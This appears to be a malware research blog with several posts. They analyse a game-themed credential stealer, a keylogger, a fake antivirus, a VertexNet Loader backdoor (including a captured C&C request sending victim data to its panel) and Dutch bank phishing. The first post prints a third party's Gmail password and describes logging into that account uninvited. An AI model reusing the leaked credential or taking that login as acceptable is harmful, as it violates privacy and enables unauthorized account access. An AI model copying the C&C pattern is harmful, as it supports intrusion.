MalwareDisasters is a division of MalwareIntelligence. In the same test information is captured about the behavior of malicious code, and also offering the necessary countermeasures to mitigate the malicious actions in question.

9.13.2012

League of legends Malware Attack

As you may already know,cyber criminals find different ways to infect computers and steal sensitive information which later they use for their bad purposes.This time,at facebook i stumbled upon a League of legends themed scam,needless to say that most of my friends are also victims.They "offer" free riot points.Let's have a look then.



As you can see,it's just a very "amateur" project,probably written in VB. To me,it looks kinda "phishy" and i really doubt whether it works or not.I would also like to mention that Riot INC is a very trustworthy company,don't try to search for any "hacks" that will give you Riot points,you will most likely fail and end up getting scammed or infected.

What was my first thoughts?It's just a regular stealer which will send your information to the author .I was right. Let's check the network activity,when you press the button "Press Here For RP".



I guess,you may have already noticed some strange network activities. But really,what is it?I don't understand a thing,that's because the packets are encrypted. So,where are my information sent?I used a tool called .NET Reflector,this tool will be able to enlighten us. Let's dive into a real debugger and grab more information about the author.



As you can see,he's using the smtp.gmail client to receive the logs and the logs are sent to the "red blurred" gmail.By the way,i am not that bad to publish his e-mail,i will tell you later why. He only wants Textbox.1 which is obviously your username,and textbox.2 which is your password.The subject of the email should be victim's username and the body should contain the password.

His Gmail password is 59347763,if the password is changed,then this programme will be useless,as it won't be able to get past through the gmail verification,therefore the logs won't be sent. Using google i was able to find even more information about the author. He got the idea of creating a phising applicaiton when he saw a tutorial at YouTube. Here,he's seeking for help and he gave his email to contact him.





What literally shocked me is that,he's only 15 years old and he's coming from Greece,from my country. Here he wants to buy a "Spy Recording Camera".



What great times do we live in,even a 15 years old kid can create his own phising application and start stealing information,just from a simple tutorial. There's too much freedom in the internet or what. Since he is only 15 years old (we have the same age),i don't want to ruin his life and that's why i didn't show you his email. I logged at his gmail and deleted all the logs,i also warned him that the next time,i won't be that good. This application should be detected as a PUP(Potentially unwanted programme).



I just wanted to show you how easy is nowadays to create your own phising programme, and start stealing credentials. Stay safe!

Phillip, Malware Researcher





Ver más

7.19.2012

I give you a picture and you give me your private data! What you say?


MD5 :  bf25f7588c58cd4b7cc5ac04ebfd00c5
SHA1:  1c8e7315fae2a2af199bc3d79a5fec5cc8de4f79
['Microsoft Visual Basic v5.0 - v6.0']

PE Information
     Win32 Executable Microsoft Visual Basic 6 (86.2%)
     Win32 Executable Generic (5.8%)
     Win32 Dynamic Link Library (generic) (5.1%)
     Generic Win/DOS Executable (1.3%)
     DOS Executable Generic (1.3%)


     Optional Header: 0x400000
     Address Of Entry Point: 0x1b04
     Compile Time: 2012-01-25 10:58:42
     Number of RVA and Sizes: 16
     DLL: False
     Number of Sections: 3


[IMAGE_RESOURCE_DIRECTORY]
     0x2B000    0x0   Characteristics: 0x0       
     0x2B004    0x4   TimeDateStamp: 0x4F1FFC81 [Wed Jan 25 12:58:41 2012 UTC]
     0x2B008    0x8   MajorVersion: 0x0       
     0x2B00A    0xA   MinorVersion: 0x0       
     0x2B00C    0xC   NumberOfNamedEntries: 0x0       
     0x2B00E    0xE   NumberOfIdEntries: 0x3  


Metadata
     Translation: 0x0409 0x04b0
     InternalName: Photo_Viewer_12_south
     FileVersion: 12.00
     CompanyName: ACDSee Image Viewer
     ProductName: My_Photos
     ProductVersion: 12.00
     OriginalFilename: Photo_Viewer_12_south.exe

Registry
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
NTS ACDSee Image Viewer c:\windows\system32\wpowercfg.exe

VT detection rate 19/37

The malware has keylogging functionality. All captured information is sent via SMTP and displays an image run:


Do you know this girl? :-)


Alex

Ver más

7.13.2012

New variant of another fake antivirus program called Live Security Platinum


This is the icon used for the fakeAV


Technical information & PE file attribute
MD5 :  8ed72a01f6dd01cf353091492d7e96c6
SHA1:  a810430d6d26e97b1a8b48898d8effe4ed8a140e
['Microsoft Visual C++ v6.0'], ['Microsoft Visual C++ 5.0'], ['Microsoft Visual C++'], ['Microsoft Visual C++ v6.0'], ['Installer VISE Custom']


PE information & sections:      
      Win32 Executable MS Visual C++ (generic) (65.2%)
      Win32 Executable Generic (14.7%)
      Win32 Dynamic Link Library (generic) (13.1%)
      Generic Win/DOS Executable (3.4%)
      DOS Executable Generic (3.4%)


     Optional Header: 0x400000
     Address Of Entry Point: 0x1953
     Compile Time: 2012-07-12 09:06:36
     Number of RVA and Sizes: 16
     Number of Sections: 4


Imported DLLs and API:
[1] KERNEL32.dll     
     0x407000 Sleep
     0x407004 CloseHandle
     0x407008 GetProcAddress
     0x40700c GetModuleHandleA
     0x407010 InterlockedExchange
     0x407014 SetEvent
     0x407018 CreateFileA
     0x40701c VirtualAllocEx
     0x407020 LCMapStringA
     0x407024 GetStringTypeW
     0x407028 GetStringTypeA
     0x40702c MultiByteToWideChar
     0x407030 RaiseException
     0x407034 LoadLibraryA
     0x407038 GetOEMCP
     0x40703c GetStartupInfoA
     0x407040 GetCommandLineA
     0x407044 GetVersion
     0x407048 ExitProcess
     0x40704c HeapFree
     0x407050 TerminateProcess
     0x407054 GetCurrentProcess
     0x407058 UnhandledExceptionFilter
     0x40705c GetModuleFileNameA
     0x407060 FreeEnvironmentStringsA
     0x407064 FreeEnvironmentStringsW
     0x407068 WideCharToMultiByte
     0x40706c GetEnvironmentStrings
     0x407070 GetEnvironmentStringsW
     0x407074 SetHandleCount
     0x407078 GetStdHandle
     0x40707c GetFileType
     0x407080 HeapDestroy
     0x407084 HeapCreate
     0x407088 VirtualFree
     0x40708c RtlUnwind
     0x407090 WriteFile
     0x407094 HeapAlloc
     0x407098 VirtualAlloc
     0x40709c HeapReAlloc
     0x4070a0 GetCPInfo
     0x4070a4 GetACP
     0x4070a8 LCMapStringW
[2] USER32.dll       
     0x4070b0 LoadBitmapA
     0x4070b4 ShowWindow
     0x4070b8 LoadImageA
     0x4070bc LoadIconA
[3] WINMM.dll        
     0x4070c4 mixerGetControlDetailsA


VT information about detection rate 22/42


Live Security Platinum screenshots
Warning popups


Live Security Platinum GUI:





Live Security Platinum monetization

Live Security Platinum registration

** Information obtained through the automated process malware analysis of CrimewareAttack Service(by  MalwareIntelligence).

Alex



Ver más

7.06.2012

Generic trojan type backdoor via popular crimeware “Loader”

This is the icon used for this malware.


Technical information & PE file attribute
MD5 :  aab21e11953aee66ff16772576ceaec0
SHA1:  576910d3ae484144db32dd835594c605dac90a9d
[['Microsoft Visual C++ 8'], ['VC8 -> Microsoft Corporation']


This malware was created and is spread through crimeware "VertexNet Loader".


PE information & sections:
     57.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
     12.2% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)
     12.0% (.EXE) Win32 Executable Generic (6514/8/2)
     10.3% (.EXE) Win64 Executable Generic (5563/38/1)
     3.7% (.EXE) Generic Win/DOS Executable (2002/3)


Mutex: VN_MUTEX16
Optional Header: 0x400000
Address Of Entry Point: 0xaf4a
Compile Time: 2011-06-20 11:05:05
Number of RVA and Sizes: 16
Number of Sections: 5


API Functions:

     InternetReadFile
     CreateProcess
     WinExec
     ShellExecute
     URLDownloadToFileA

VT information about detection rate 35/42 


VN_MUTEX16 is the string that is set as default "mutex" through internal constructor VertexNet Loader:

This information corresponds to the default settings when creating the bot through the internal constructor:


Information report in the C&C statistics panel about infected machine:


This information is inserted into the database (default MySQL) of the crimeware. You can see this information/C&C communication in traffic capture:

GET /x1/adduser.php?uid={52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}
&lan=XXX.XXX.XXX.XXX&cmpname=XXXXXXXXXX-59903E%20[Administrator]&country= &idle=0&ver=v1.2 HTTP/1.1
User-Agent: V32
Host: tinker.vn

You can read more information about the functions, command and extract data in infected machine for this crimeware in MalwareIntelligence post: VertexNetLoader crimeware timeline, popular functions and marketing scheme


VertexNet Loader crimeware C&C
In this case, the malicious software have you control panel in hxxp://tinker.vn/x1/


** Information obtained through the automated process malware analysis of CrimewareAttack Service (by  MalwareIntelligence).

Alex

Ver más

4.12.2011

Increase in Dutch banking phishing

The last few months there was an increase in a phishing campaign targeted on customers from Rabobank and ING, two major banks in The Netherlands and Belgium. Some examples of a phishing mail:

Phishing email for ING with the subject “Account Verificatie” (or in English: “Account Verification”)


Phishing email for Rabobank with the subject “Customer Services Update”.

If you speak the Dutch language, you notice the content of the emails are actually more different than most phishing mails. In fact there’s a bigger variety, and in the first version there is almost no grammatical or spelling error. The second email - for Rabobank- however, is clearly a Google Translate copy/paste job.

All emails seem to be originating from valid email addresses, domains are pointing to @rabobank.nl and @ing.nl , which are in fact legitimate addresses from the two banks.
However, if we check the message headers we can see IP’s originating from Nigeria:

41.155.32.70IPVoid results
82.128.38.67IPVoid results

Another IP address is originating from New Zealand and is actually blacklisted on several blacklists, as can be confirmed when checking with IPVoid:

203.97.33.68IPVoid results

This means the email-addresses are spoofed to trick users into believing the email is valid.
Now, what happens if you click on the link included in the message?  You will be redirected to any of these pages:

Phishing website for ING. The user needs to login with his/her username and password. You can also opt to login with the ‘calculator’. The calculator is in fact a card reader which you can use to login.


Phishing website for Rabobank.  You can login using your account number, access code, and PIN code. You can also use your card reader.

The intention of these emails is of course to steal user credentials and empty the account of the duped user. These attacks are pretty well orchestrated. If you click on any of the links on the phishing page, it will redirect you to the real ING website which provides extra information on the topic you clicked on.

The following tips do not only apply to the above story, but apply to any other (suspicious) email you receive:
  • Do not click on any of the links (or anything for that matter) in the email you have received.
  • Do not reply to the email.
  • Delete the email immediately, certainly if you are not a customer of the aforementioned bank or did not order anything, changed your password, and so on.
  • If you really need to access or check your bank account, visit the website directly by typing the address in your browser’s address bar. Also verify the URL starts with https instead of http.
  • Another useful trick is to hover over the link in the email. In the bottom left corner you should be able to see the real address behind the URL displayed.
  • When in doubt, you can double-check using URL scanning services such as VirusTotal or URLVoid by our partner NoVirusThanks.

Bart Parys
Malware Research
Twitter: @bartblaze

Ver más